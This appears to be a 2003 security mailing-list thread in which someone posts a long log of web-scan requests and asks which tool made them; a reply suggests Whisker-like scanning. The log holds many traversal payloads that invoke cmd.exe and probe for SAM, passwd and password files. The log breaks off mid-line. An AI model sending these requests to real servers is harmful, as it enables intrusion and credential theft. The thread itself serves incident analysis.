Replying to you and the list....I can never seem to get postings on the list anymore....not sure why. That's quite a list of hits. Whisker would be one (among many) tools that could generate a pattern like that. It doesn't look like a worm to me. Seems like somebody has specifically targeted you...or is auditing a neighboring web server and mis-typed an IP address;) It looks like a scanning tool that's just looking for all kinds of vulnerabilities. Are they all from the same source? Do you have any kind of anomaly-based IDS like SHADOW that would be collecting all headers? If so, you could look for the source IP address. If not, you could hook up something on the outside and watch for that IP address. -----Original Message----- From: deanat_private [mailto:deanat_private] Sent: Sunday, April 06, 2003 3:24 PM To: incidentsat_private Subject: Does anyone recognize the scanner that causes this pattern ? I recently logged a fairly extensive web scan and am trying to ID the tool responsible. Has anyone seen this particular pattern before ? HEAD /.html/............*/config.sys HTTP/1.0\x0a\x0a HEAD /.html/............./config.sys HTTP/1.0\x0a\x0a HEAD /.html/............/autoexec.bat HTTP/1.0\x0a\x0a HEAD /.jsp/WEB-INF/classes/Env.java HTTP/1.0\x0a\x0a HEAD /.nsf/../winnt/win.ini HTTP/1.0\x0a\x0a HEAD /../boot.ini HTTP/1.0\x0a\x0a HEAD /../config.sys HTTP/1.0\x0a\x0a HEAD /a.asp/..../..../winnt/repair/sam HTTP/1.0\x0a\x0a HEAD /a.jsp//..//..//..//..//..//../winnt/win.ini HTTP/1.0\x0a\x0a HEAD /cgi HTTP/1.0\x0a\x0a HEAD /cgi/ HTTP/1.0\x0a\x0a HEAD /cgibin HTTP/1.0\x0a\x0a HEAD /cgi-bin HTTP/1.0\x0a\x0a HEAD /cgibin/ HTTP/1.0\x0a\x0a HEAD /cgi-bin/ HTTP/1.0\x0a\x0a HEAD /cgi-bin/../../../../winnt/system32/cmd.exe HTTP/1.0\x0a\x0a HEAD /cgi-bin/......../winnt/system32/cmd.exe HTTP/1.0\x0a\x0a HEAD /cgi-bin/............winntsystem32cmd.exe?/c+dir+c: HTTP/1.0\x0a\x0a HEAD /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /cgi-bin/sam._ HTTP/1.0\x0a\x0a HEAD /cgi-win HTTP/1.0\x0a\x0a HEAD /cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a HEAD /doc HTTP/1.0\x0a\x0a HEAD /iisadmin HTTP/1.0\x0a\x0a HEAD /iisadmin/ HTTP/1.0\x0a\x0a HEAD /iisamples/Sdk HTTP/1.0\x0a\x0a HEAD /iissamples HTTP/1.0\x0a\x0a HEAD /iissamples/Default HTTP/1.0\x0a\x0a HEAD /script/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /scripts HTTP/1.0\x0a\x0a HEAD /scripts/ HTTP/1.0\x0a\x0a HEAD /scripts/* HTTP/1.0\x0a\x0a HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0 \x0a\x0a HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a HEAD /scripts/../../cmd.exe HTTP/1.0\x0a\x0a HEAD /scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /scripts/..../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a HEAD /scripts/........../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /scripts/........../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a HEAD /scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /scripts/cmd.exe HTTP/1.0\x0a\x0a HEAD /scripts/cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a HEAD /scripts/iisadmin/default.htm HTTP/1.0\x0a\x0a HEAD /scripts/iisadmin/samples HTTP/1.0\x0a\x0a HEAD /scripts/iisadmin/tools HTTP/1.0\x0a\x0a HEAD /scripts/perl HTTP/1.0\x0a\x0a HEAD /scripts/samples HTTP/1.0\x0a\x0a HEAD /scripts/tools HTTP/1.0\x0a\x0a HEAD /search HTTP/1.0\x0a\x0a HEAD /server-info HTTP/1.0\x0a\x0a HEAD /server-status HTTP/1.0\x0a\x0a HEAD /_AuthChangeUrl HTTP/1.0\x0a\x0a HEAD /_AuthChangeUrl? HTTP/1.0\x0a\x0a HEAD /_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a HEAD /_mem_bin/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /_mem_bin/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a HEAD /_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /_private HTTP/1.0\x0a\x0a HEAD /_vti_bin/_vti_adm HTTP/1.0\x0a\x0a HEAD /_vti_bin/_vti_aut HTTP/1.0\x0a\x0a HEAD /_vti_bin HTTP/1.0\x0a\x0a HEAD /_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a HEAD /_vti_bin/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /_vti_bin/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a HEAD /_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /cgi-bin/_vti_cnf HTTP/1.0\x0a\x0a HEAD /_vti_inf.html HTTP/1.0\x0a\x0a HEAD /_vti_log HTTP/1.0\x0a\x0a HEAD /_vti_pvt HTTP/1.0\x0a\x0a HEAD /_vti_pvt/ HTTP/1.0\x0a\x0a HEAD /_vti_bin/shtml.dll/_vti_rpc HTTP/1.0\x0a\x0a HEAD /_vti_txt HTTP/1.0\x0a\x0a HEAD /abczxv.htw HTTP/1.0\x0a\x0a HEAD /msadc/samples/adctest.asp HTTP/1.0\x0a\x0a HEAD /scripts/Carello/add.exe HTTP/1.0\x0a\x0a HEAD /cfdocs/exampleapp/publish/admin/addcontent.cfm HTTP/1.0\x0a\x0a HEAD /_vti_adm/admin.dll HTTP/1.0\x0a\x0a HEAD /scripts/admin.exe?/c+dir%20c: HTTP/1.0\x0a\x0a HEAD /_vti_pvt/administrator.pwd HTTP/1.0\x0a\x0a HEAD /_vti_pvt/administrators.pwd HTTP/1.0\x0a\x0a HEAD /session/adminlogin HTTP/1.0\x0a\x0a HEAD /admisapi/ HTTP/1.0\x0a\x0a HEAD /iissamples/exair/search/advsearch.asp HTTP/1.0\x0a\x0a HEAD /Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..% 2Fetc&dispsize=640&start=0 HTTP/1.0\x0a\x0a HEAD /cgi-bin/alibaba.pl HTTP/1.0\x0a\x0a HEAD /app.cfm HTTP/1.0\x0a\x0a HEAD /cgi-dos/args.bat HTTP/1.0\x0a\x0a HEAD /cgi-dos/args.cmd HTTP/1.0\x0a\x0a HEAD /_vti_bin/_vti_aut/author.dll HTTP/1.0\x0a\x0a HEAD /_vti_pvt/author.log HTTP/1.0\x0a\x0a HEAD /_vti_pvt/authors.pwd HTTP/1.0\x0a\x0a HEAD /autoexec.bat HTTP/1.0\x0a\x0a HEAD /cgi-bin/bb-hostsvc.sh HTTP/1.0\x0a\x0a HEAD /scripts/bbs.pl%3F+.htr HTTP/1.0\x0a\x0a HEAD /bdir.htr HTTP/1.0\x0a\x0a HEAD /cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.0\x0a\x0a HEAD /bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0 \x0a\x0a HEAD /bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a HEAD /bin/scripts/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /bin/scripts/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a HEAD /bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /common/browser.inc HTTP/1.0\x0a\x0a HEAD /scripts/c32web.exe HTTP/1.0\x0a\x0a HEAD /carbo.dll HTTP/1.0\x0a\x0a HEAD /scripts/Carello/Carello.dll HTTP/1.0\x0a\x0a HEAD /scripts/cart32.exe HTTP/1.0\x0a\x0a HEAD /scripts/cart32.exe/cart32clientlist HTTP/1.0\x0a\x0a HEAD /catalog.nsf HTTP/1.0\x0a\x0a HEAD /catalog.nsf/ HTTP/1.0\x0a\x0a HEAD /AdvWorks/equipment/catalog_type.asp HTTP/1.0\x0a\x0a HEAD /ASPSamp/AdvWorks/equipment/catalog_type.asp HTTP/1.0\x0a\x0a HEAD /WebShop/logs/cc.txt HTTP/1.0\x0a\x0a HEAD /WebShop/templates/cc.txt HTTP/1.0\x0a\x0a HEAD /cgi-bin/ceilidh.exe HTTP/1.0\x0a\x0a HEAD /cfcache.map HTTP/1.0\x0a\x0a HEAD /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0\x0a\x0a HEAD /cfusion/database/cfsnippets.mdb HTTP/1.0\x0a\x0a HEAD /scripts/cgimail.exe HTTP/1.0\x0a\x0a HEAD /scripts/CGImail.exe HTTP/1.0\x0a\x0a HEAD /cgi-bin/cgitest.exe HTTP/1.0\x0a\x0a HEAD /scripts/c32web.exe/ChangeAdminPassword HTTP/1.0\x0a\x0a HEAD /cgi-bin/changepw.exe HTTP/1.0\x0a\x0a HEAD /cgi-bin/c32web.exe/CheckError?error=53 HTTP/1.0\x0a\x0a HEAD /config/checks.txt HTTP/1.0\x0a\x0a HEAD /WebShop/logs/ck.log HTTP/1.0\x0a\x0a HEAD /msadc/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a HEAD /msadc/..../..../..../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /msadc/..../..../..../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0 \x0a\x0a HEAD /msadc/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /msadc/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a HEAD /msadc/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /msadc/msadcs.dll HTTP/1.0\x0a\x0a HEAD /scripts/tools/newdsn.exe HTTP/1.0\x0a\x0a HEAD /nofile.pl HTTP/1.0\x0a\x0a HEAD /_vti_bin/shtml.dll/nosuch.htm HTTP/1.0\x0a\x0a HEAD /scripts/no-such-file.pl HTTP/1.0\x0a\x0a HEAD /cfdocs/expelval/openfile.cfm HTTP/1.0\x0a\x0a HEAD /cfdocs/expeval/openfile.cfm HTTP/1.0\x0a\x0a HEAD /Admin_files/order.log HTTP/1.0\x0a\x0a HEAD /_private/orders.txt HTTP/1.0\x0a\x0a HEAD /config/orders.txt HTTP/1.0\x0a\x0a HEAD /wwwboard/passwd.txt HTTP/1.0\x0a\x0a HEAD /pbserver/ HTTP/1.0\x0a\x0a HEAD /pbserver/pbserver.dll HTTP/1.0\x0a\x0a HEAD /cgi-bin/perl.exe HTTP/1.0\x0a\x0a HEAD /cgi-bin/scripts/perl.exe HTTP/1.0\x0a\x0a HEAD /cgi-win/perl.exe HTTP/1.0\x0a\x0a HEAD /ows-bin/perlidlc.bat?&dir HTTP/1.0\x0a\x0a HEAD /scripts/pfieffer.bat HTTP/1.0\x0a\x0a HEAD /scripts/pfieffer.cmd HTTP/1.0\x0a\x0a HEAD /cgi-bin/post32.exe HTTP/1.0\x0a\x0a HEAD /scripts/postinfo.asp HTTP/1.0\x0a\x0a HEAD /cgi-bin/ppdscgi.exe HTTP/1.0\x0a\x0a HEAD /private HTTP/1.0\x0a\x0a HEAD /process_bug.cgi HTTP/1.0\x0a\x0a HEAD /iissamples/iissamples/query.asp HTTP/1.0\x0a\x0a HEAD /iissamples/issamples/query.asp HTTP/1.0\x0a\x0a HEAD /samples/search/queryhit.htm HTTP/1.0\x0a\x0a HEAD /cfusion/cfapps/security/data/realm.mdb HTTP/1.0\x0a\x0a HEAD /cfusion/cfapps/security/realm_.mdb HTTP/1.0\x0a\x0a HEAD /scripts/emurl/RECMAN.dll HTTP/1.0\x0a\x0a HEAD /cgi-bin/redirect.exe HTTP/1.0\x0a\x0a HEAD /_private/register.txt HTTP/1.0\x0a\x0a HEAD /_private/registrations.txt HTTP/1.0\x0a\x0a HEAD /scripts/repost.asp HTTP/1.0\x0a\x0a HEAD /bin/scripts/openvendor/gnete/RetrievePNBody.asp HTTP/1.0\x0a\x0a HEAD /cgi-bin/rguest.exe HTTP/1.0\x0a\x0a HEAD /scripts/rguest.exe HTTP/1.0\x0a\x0a HEAD /robots.txt HTTP/1.0\x0a\x0a HEAD /cfdocs/root.cfm HTTP/1.0\x0a\x0a HEAD /scripts/root.exe?/c+dir%20c: HTTP/1.0\x0a\x0a HEAD /sample.asp HTTP/1.0\x0a\x0a HEAD /IISSAMPLES/ExAir/Search/search.asp HTTP/1.0\x0a\x0a HEAD /search.dll HTTP/1.0\x0a\x0a HEAD /cgi-bin/search97.vts HTTP/1.0\x0a\x0a HEAD /search97.vts HTTP/1.0\x0a\x0a HEAD /cfdocs/expeval/sendmail.cfm HTTP/1.0\x0a\x0a HEAD /_vti_pvt/service.grp HTTP/1.0\x0a\x0a HEAD /cfdocs/expelval/sendmail.cfm HTTP/1.0\x0a\x0a HEAD /_vti_pvt/service.pwd HTTP/1.0\x0a\x0a HEAD /servlet/SessionServlet HTTP/1.0\x0a\x0a HEAD /cgi-bin/shop.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/shopper.cgi HTTP/1.0\x0a\x0a HEAD /_private/shopping_cart.mdb HTTP/1.0\x0a\x0a HEAD /cgi-bin/c32web.exe/ShowAdminDir HTTP/1.0\x0a\x0a HEAD /iissamples/exair/howitworks/showcode.asp HTTP/1.0\x0a\x0a HEAD /msadc/samples/selector/showcode.asp HTTP/1.0\x0a\x0a HEAD /msadc/samples/selector/showcode.asp_2 HTTP/1.0\x0a\x0a HEAD /showfile.asp HTTP/1.0\x0a\x0a HEAD /_vti_bin/shtml.dll HTTP/1.0\x0a\x0a HEAD /_vti_pvt/shtml.dll HTTP/1.0\x0a\x0a HEAD /_vti_bin/shtml.exe HTTP/1.0\x0a\x0a HEAD /_vti_pvt/shtml.exe HTTP/1.0\x0a\x0a HEAD /ex/jsp/simple.jsp. HTTP/1.0\x0a\x0a HEAD /adsamples/config/site.csc HTTP/1.0\x0a\x0a HEAD /scripts/slxweb.dll HTTP/1.0\x0a\x0a HEAD /smdata.dat HTTP/1.0\x0a\x0a HEAD /cfusion/database/smpolicy.mdb HTTP/1.0\x0a\x0a HEAD /cgi-bin/snorkerz.bat HTTP/1.0\x0a\x0a HEAD /cgi-bin/snorkerz.cmd HTTP/1.0\x0a\x0a HEAD /cfdocs/exampleapp/docs/sourcewindow.cfm HTTP/1.0\x0a\x0a HEAD /srchadm HTTP/1.0\x0a\x0a HEAD /cgi-bin/statsconfig.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/test.bat HTTP/1.0\x0a\x0a HEAD /cgi-bin/test.cgi HTTP/1.0\x0a\x0a HEAD /today.nsf HTTP/1.0\x0a\x0a HEAD /tree.dat HTTP/1.0\x0a\x0a HEAD /cgi-bin/tst.bat HTTP/1.0\x0a\x0a HEAD /admin/ HTTP/1.0\x0a\x0a HEAD /administrator/ HTTP/1.0\x0a\x0a HEAD /bbs/ HTTP/1.0\x0a\x0a HEAD /bbs/admin/ HTTP/1.0\x0a\x0a HEAD /bbs/admin/config/ HTTP/1.0\x0a\x0a HEAD /bbs/data/ HTTP/1.0\x0a\x0a HEAD /bbs/db/ HTTP/1.0\x0a\x0a HEAD /bbs/include/ HTTP/1.0\x0a\x0a HEAD /cache-stats/ HTTP/1.0\x0a\x0a HEAD /card/ HTTP/1.0\x0a\x0a HEAD /cgi-bin/admin/admin HTTP/1.0\x0a\x0a HEAD /cgi-bin/Board/db/ HTTP/1.0\x0a\x0a HEAD /cgi-bin/campas HTTP/1.0\x0a\x0a HEAD /cgi-bin/counterfiglet/nc/f HTTP/1.0\x0a\x0a HEAD /cgi-bin/jj HTTP/1.0\x0a\x0a HEAD /cgi-bin/perl HTTP/1.0\x0a\x0a HEAD /cgi-bin/query HTTP/1.0\x0a\x0a HEAD /cgi-bin/ssi HTTP/1.0\x0a\x0a HEAD /cgi-bin/wrap HTTP/1.0\x0a\x0a HEAD /config/ HTTP/1.0\x0a\x0a HEAD /customer/ HTTP/1.0\x0a\x0a HEAD /data/ HTTP/1.0\x0a\x0a HEAD /database/ HTTP/1.0\x0a\x0a HEAD /databases/ HTTP/1.0\x0a\x0a HEAD /db/ HTTP/1.0\x0a\x0a HEAD /dbase/ HTTP/1.0\x0a\x0a HEAD /deny/ HTTP/1.0\x0a\x0a HEAD /devel/ HTTP/1.0\x0a\x0a HEAD /docs/ HTTP/1.0\x0a\x0a HEAD /document/ HTTP/1.0\x0a\x0a HEAD /documents/ HTTP/1.0\x0a\x0a HEAD /down/ HTTP/1.0\x0a\x0a HEAD /download/ HTTP/1.0\x0a\x0a HEAD /downloads/ HTTP/1.0\x0a\x0a HEAD /example/ HTTP/1.0\x0a\x0a HEAD /exec/show/config/cr HTTP/1.0\x0a\x0a HEAD /file/ HTTP/1.0\x0a\x0a HEAD /files/ HTTP/1.0\x0a\x0a HEAD /forum/ HTTP/1.0\x0a\x0a HEAD /ftp/ HTTP/1.0\x0a\x0a HEAD /girl/ HTTP/1.0\x0a\x0a HEAD /girls/ HTTP/1.0\x0a\x0a HEAD /hire/ HTTP/1.0\x0a\x0a HEAD /htdocs/ HTTP/1.0\x0a\x0a HEAD /idea/ HTTP/1.0\x0a\x0a HEAD /ideas/ HTTP/1.0\x0a\x0a HEAD /image/ HTTP/1.0\x0a\x0a HEAD /images/ HTTP/1.0\x0a\x0a HEAD /img/ HTTP/1.0\x0a\x0a HEAD /inc/ HTTP/1.0\x0a\x0a HEAD /include/ HTTP/1.0\x0a\x0a HEAD /include/inc/ HTTP/1.0\x0a\x0a HEAD /includes/ HTTP/1.0\x0a\x0a HEAD /incoming/ HTTP/1.0\x0a\x0a HEAD /install/ HTTP/1.0\x0a\x0a HEAD /lib/ HTTP/1.0\x0a\x0a HEAD /library/ HTTP/1.0\x0a\x0a HEAD /linux/ HTTP/1.0\x0a\x0a HEAD /logging/ HTTP/1.0\x0a\x0a HEAD /manual/ HTTP/1.0\x0a\x0a HEAD /misc/ HTTP/1.0\x0a\x0a HEAD /mp3/ HTTP/1.0\x0a\x0a HEAD /mrtg/ HTTP/1.0\x0a\x0a HEAD /msql/ HTTP/1.0\x0a\x0a HEAD /mysql/ HTTP/1.0\x0a\x0a HEAD /number/ HTTP/1.0\x0a\x0a HEAD /pds/ HTTP/1.0\x0a\x0a HEAD /perl HTTP/1.0\x0a\x0a HEAD /phone/ HTTP/1.0\x0a\x0a HEAD /php/ HTTP/1.0\x0a\x0a HEAD /php3/ HTTP/1.0\x0a\x0a HEAD /php4/ HTTP/1.0\x0a\x0a HEAD /porno/ HTTP/1.0\x0a\x0a HEAD /ports/ HTTP/1.0\x0a\x0a HEAD /private/ HTTP/1.0\x0a\x0a HEAD /program/ HTTP/1.0\x0a\x0a HEAD /programming/ HTTP/1.0\x0a\x0a HEAD /programs/ HTTP/1.0\x0a\x0a HEAD /public/ HTTP/1.0\x0a\x0a HEAD /secret/ HTTP/1.0\x0a\x0a HEAD /secrets/ HTTP/1.0\x0a\x0a HEAD /server_stats/ HTTP/1.0\x0a\x0a HEAD /server-info/ HTTP/1.0\x0a\x0a HEAD /server-status/ HTTP/1.0\x0a\x0a HEAD /set/ HTTP/1.0\x0a\x0a HEAD /setting/ HTTP/1.0\x0a\x0a HEAD /setup/ HTTP/1.0\x0a\x0a HEAD /sex/ HTTP/1.0\x0a\x0a HEAD /snmp/ HTTP/1.0\x0a\x0a HEAD /source/ HTTP/1.0\x0a\x0a HEAD /sources/ HTTP/1.0\x0a\x0a HEAD /sql/ HTTP/1.0\x0a\x0a HEAD /stat/ HTTP/1.0\x0a\x0a HEAD /statistics/ HTTP/1.0\x0a\x0a HEAD /Stats/ HTTP/1.0\x0a\x0a HEAD /stats/ HTTP/1.0\x0a\x0a HEAD /telephone/ HTTP/1.0\x0a\x0a HEAD /temp/ HTTP/1.0\x0a\x0a HEAD /temporary/ HTTP/1.0\x0a\x0a HEAD /test/ HTTP/1.0\x0a\x0a HEAD /tool/ HTTP/1.0\x0a\x0a HEAD /tools/ HTTP/1.0\x0a\x0a HEAD /usage/ HTTP/1.0\x0a\x0a HEAD /weblog/ HTTP/1.0\x0a\x0a HEAD /weblogs/ HTTP/1.0\x0a\x0a HEAD /webstats/ HTTP/1.0\x0a\x0a HEAD /work/ HTTP/1.0\x0a\x0a HEAD /wstats/ HTTP/1.0\x0a\x0a HEAD /wwwlog/ HTTP/1.0\x0a\x0a HEAD /wwwstats/ HTTP/1.0\x0a\x0a HEAD /acid/ HTTP/1.0\x0a\x0a HEAD /acid/acid_main.php HTTP/1.0\x0a\x0a HEAD /cgi-bin/ad.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/adcycle HTTP/1.0\x0a\x0a HEAD /secret/secret/add-user.shmtl HTTP/1.0\x0a\x0a HEAD /admin.php3?admin=anything HTTP/1.0\x0a\x0a HEAD /adpassword.txt HTTP/1.0\x0a\x0a HEAD /cgi-bin/aglimpse HTTP/1.0\x0a\x0a HEAD /cgi-bin/allmanage.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/allmanageup.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/amlite/amadmin.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/anacondaclip.pl?template=check HTTP/1.0\x0a\x0a HEAD /cgi-bin/AnyForm2 HTTP/1.0\x0a\x0a HEAD /cgi-bin/AT-admin.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/AT-generate.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/awl/auctionweaver.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/auktion.pl HTTP/1.0\x0a\x0a HEAD /banners.php?op=Change HTTP/1.0\x0a\x0a HEAD /cgi-bin/bb-hist.sh HTTP/1.0\x0a\x0a HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0\x0a\x0a HEAD /examples/applications/bboard/bboard_frames.html HTTP/1.0\x0a\x0a HEAD /cgi-bin/bizdb1-search.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/bnbform.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/build.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/cached_feed.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/cachemgr.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/cal_make.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/calender.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/calender_admin.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/s.cgi?q=a&tmpl=check HTTP/1.0\x0a\x0a HEAD /cgi-bin-sdb HTTP/1.0\x0a\x0a HEAD /cgi-bin/cgiforum.pl HTTP/1.0\x0a\x0a HEAD /manage/cgi/cgiproc HTTP/1.0\x0a\x0a HEAD /cgi-bin/cgiwrap HTTP/1.0\x0a\x0a HEAD /secret/secret/change-passwd.shtml HTTP/1.0\x0a\x0a HEAD /cgi-bin/changepw.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/classifieds.cgi HTTP/1.0\x0a\x0a HEAD /caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd HTTP/1.0\x0a\x0a HEAD /caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server HTTP/1.0 \x0a\x0a HEAD /caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini HTTP/1.0 \x0a\x0a HEAD /caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC HTTP/1.0 \x0a\x0a HEAD /caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000 HTTP/1.0 \x0a\x0a HEAD /servlet/com.livesoftware.jrun.plugins.jsp.JSP HTTP/1.0\x0a\x0a HEAD /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter HTTP/1.0\x0a\x0a HEAD /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0\x0a\x0a HEAD /cgi-bin/commerce.cgi?page=check HTTP/1.0\x0a\x0a HEAD /forum/common.php HTTP/1.0\x0a\x0a HEAD /phorum/common.php HTTP/1.0\x0a\x0a HEAD /cgi-bin/Count.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/CrazyWWWBoard.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/csvform.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/htgrep HTTP/1.0\x0a\x0a HEAD /cgi-bin/htmlscript HTTP/1.0\x0a\x0a HEAD /cgi-bin/htsearch HTTP/1.0\x0a\x0a HEAD /cgi-bin/htsearch?config=aaa HTTP/1.0\x0a\x0a HEAD /index.html.bak HTTP/1.0\x0a\x0a HEAD /index.html~ HTTP/1.0\x0a\x0a HEAD /index.js%2570 HTTP/1.0\x0a\x0a HEAD /index.php.bak HTTP/1.0\x0a\x0a HEAD /index.php~ HTTP/1.0\x0a\x0a HEAD /index.php3?vhosts[test]= HTTP/1.0\x0a\x0a HEAD /adminlogin?RCpage=/sysadmin/index.stm HTTP/1.0\x0a\x0a HEAD /cgi-bin/info2www HTTP/1.0\x0a\x0a HEAD /cgi-bin/infosrch.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/lasso.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/loadpage.cgi HTTP/1.0\x0a\x0a HEAD /ConsoleHelp/login.jsp HTTP/1.0\x0a\x0a HEAD /login.jsp HTTP/1.0\x0a\x0a HEAD /cgi-bin/mailfile.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/mailform.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/maillist.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/mailnews.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/mailto.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/man.sh HTTP/1.0\x0a\x0a HEAD /manual.php HTTP/1.0\x0a\x0a HEAD /cgi-bin/mdma.bat HTTP/1.0\x0a\x0a HEAD /cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES= HTTP/1.0\x0a\x0a HEAD /class/mysql.class HTTP/1.0\x0a\x0a HEAD /names.nsf HTTP/1.0\x0a\x0a HEAD /ncl_items.html?SUBJECT=2097 HTTP/1.0\x0a\x0a HEAD /cgi-bin/netauth.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/news/news.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/nph-maillist.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/nph-publish HTTP/1.0\x0a\x0a HEAD /cgi-bin/nph-test-cgi HTTP/1.0\x0a\x0a HEAD /examples/jsp/num/numguess.js%70 HTTP/1.0\x0a\x0a HEAD /cgi-bin/pagelog.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/pals-cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/newsdesk.cgi?t=../pass.txt HTTP/1.0\x0a\x0a HEAD /opendir.php?requesturl=/etc/passwd HTTP/1.0\x0a\x0a HEAD /piranha/secure/passwd.php3 HTTP/1.0\x0a\x0a HEAD /cgi-bin/perlshop.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/pfdisplay.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/phf HTTP/1.0\x0a\x0a HEAD /cgi-bin/phf.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/php HTTP/1.0\x0a\x0a HEAD /cgi-bin/php.cgi HTTP/1.0\x0a\x0a HEAD /phpgroupware/inc/phpgwapi/phpgw.inc.php HTTP/1.0\x0a\x0a HEAD /cgi-bin/plusmail HTTP/1.0\x0a\x0a HEAD /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00 HTTP/1.0 \x0a\x0a HEAD /cgi-bin/postings.cgi? action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0 HTTP/1.0\x0a\x0a HEAD /cgi-bin/post-query HTTP/1.0\x0a\x0a HEAD /cgi-bin/processit.pl HTTP/1.0\x0a\x0a HEAD /PSUser/PSCOErrPage.htm HTTP/1.0\x0a\x0a HEAD /pservlet.html HTTP/1.0\x0a\x0a HEAD /cgi-bin/ipf/etc/gfw/ui/pwd.dat HTTP/1.0\x0a\x0a HEAD /Newuser?Image=../../database/rbsserv.mdb HTTP/1.0\x0a\x0a HEAD /cgi-bin/redirect.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/register.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/responder.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/rpm_query HTTP/1.0\x0a\x0a HEAD /cgi-bin/rwwwshell.pl HTTP/1.0\x0a\x0a HEAD /sawmill HTTP/1.0\x0a\x0a HEAD /scancfg.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/search.cgi?letter= HTTP/1.0\x0a\x0a HEAD /cgi-bin/Search.pl HTTP/1.0\x0a\x0a HEAD 